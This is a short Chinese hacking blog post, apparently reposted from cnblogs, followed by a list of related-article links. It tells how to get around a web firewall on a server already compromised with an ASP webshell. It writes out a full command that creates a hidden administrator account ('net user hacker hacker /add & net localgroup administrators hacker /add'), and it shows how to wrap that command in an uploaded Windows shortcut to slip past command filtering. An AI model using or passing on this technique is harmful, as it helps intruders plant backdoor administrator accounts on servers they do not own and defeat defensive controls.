对于有突破一流信息拦截系统的网站,上传个马就不容易,好容易上传了,还不能执行命令,郁闷了..
执行命令提权的时候因为命令里有 net user 被拦截
换个思路。
运行批命令和直接执行命令效果是一样的,它既然不让执行net命令,我运行批命令还不行吗?
立刻动手,在asp马里点[新建文件] 把名字改称hacker.bat 在内容里写上:
net usernet user hacker$ /del
net usernet user hacker$ hacker /add
net localgroup administrators hacker$ /add
OK。保存!
晕!不成功!直接被拦....
郁闷了一会,又想个办法:在本地弄个批命令,然后上传,这拦截系统总不会对文件拦截吧?
OK。上传!
晕!www.2cto.com 又被拦!...
淫荡方法如下:
1、准备提权命令:%windir%\system32\cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add
2、新建快捷方式,在地址栏写入提权命令
3、上传这个快捷方式
4、在提权工具帮助下运行这个快捷方式.....
5、管理员添加成功....
此法可用于“QQ拼音”输入法帮助打开IE直接提权WIN8

转载于:https://www.cnblogs.com/h4ck0ne/p/5154696.html

突破变态限制快捷方式提权法相关推荐

  1. Linux提权全剧终

    喜欢就关注我吧,订阅更多最新安全知识 文章来源|MS08067 内网安全知识星球 本文作者:非正常接触(Ms08067内网安全小组成员) 内网纵横四海  认准Ms08067 这里介绍一些Linux提权 ...

  2. 后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...

  3. iis6 提权提示 Can not find wmiprvse.exe 的突破方法

    方法一: 在IIS环境下,如果权限做得不严格,我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的.进程查看里面直接K掉 在结束之后,它会再次运行,这时候的PID值的不一样的.这时候我 ...

  4. 提权(最全的WEBSHELL)

    最全的WEBSHELL c: d: e:- C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv ...

  5. WINDOWS渗透与提权总结(1)

    旁站路径问题: 1.读网站配置. 2.用以下VBS: 01 On Error Resume Next 02   03 If (LCase(Right(WScript.Fullname, 11)) = ...

  6. WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权

    前言 发现这个漏洞的时候, 笔者正在机房上课.正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑. 没想到就随手扫描到一台WIN ...

  7. [多图]输入法漏洞再现Windows 8 利用QQ拼音纯净版实现提权

    发现这个漏洞的时候, 笔者正在机房上课.正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑.没想到就随手扫描到一台WIN8的系统 ...

  8. [原创]WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权

    前言 发现这个漏洞的时候, 笔者正在机房上课.正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑. 没想到就随手扫描到一台WIN ...

  9. QQ拼音直接提权WIN8

    个人测试可以,文章写得很好,思路很重要 #转载 用QQ拼音直接提权WIN8 本文来自: 网络安全***研究室(www.91ri.org) 请尊重作者,转载时带上版权信息. 详细内容请参考:http:/ ...

  10. 提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

    一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的 ...

最新文章

  1. python文本分类特征选择_文本挖掘之特征选择(python 实现)
  2. Strange List CodeForces - 1471B
  3. Pytorch 之autograd
  4. python判断序列符号变化的次数
  5. Initial Audio Trap Empire Heatup3 Expansion (HeatUp3通用音色库)
  6. 一个空格惹的祸:服务器端接收不到前端采用问号传参方式传过来的值
  7. 解决RHEL6 vncserver 启动 could not open default font 'fixed'错误.
  8. 基于单片机PID电机调速控制设计-基于单片机LED条屏显示温度和时间设计-基于单片机PM2.5雾霾检测处理控制设计-基于单片机SHT11温湿度采集报警系统设计-基于单片机8155秒表计时器系统设计
  9. TRANSCAD基础技巧——质心连杆生成不了?
  10. 城域网光纤、拨号光纤与ADSL的区别
  11. 理光GR Android wifi,理光gr2wifi怎么用
  12. 中英文金额大写转换器
  13. Linux系统安装教程(详细版)
  14. 第一P2P收购中国典当联盟发力供应链金融模式
  15. 判断电路是正反馈还是负反馈,电流反馈还是电压反馈
  16. 基于ichartjs在android上使用HTML5实现各种图表的类库
  17. pygame-KidsCanCode系列jumpy-part12-platform图片
  18. JavaScript11:事件
  19. Mac 此账户尚未用于app store_献给mac新手,Mac日常软件APP推荐
  20. Java8 Stream 遍历数据效率差?实测结果出乎意料~~

热门文章

  1. k8s的精简版k3s安装
  2. webpack打包vue项目IE报错,“对象不支持“use”属性或方法”
  3. 同步异步与阻塞非阻塞
  4. python三级菜单的实现
  5. docker使用官方仓库上传与下拉images
  6. 训练深度神经网络提示
  7. Docker 比较好的新入门教程
  8. 浅谈数据迁移测试(转载)
  9. 远程连接桌面报:这可能是由于credssp加密oracle修正
  10. Python_爬虫笔记_2018.3.19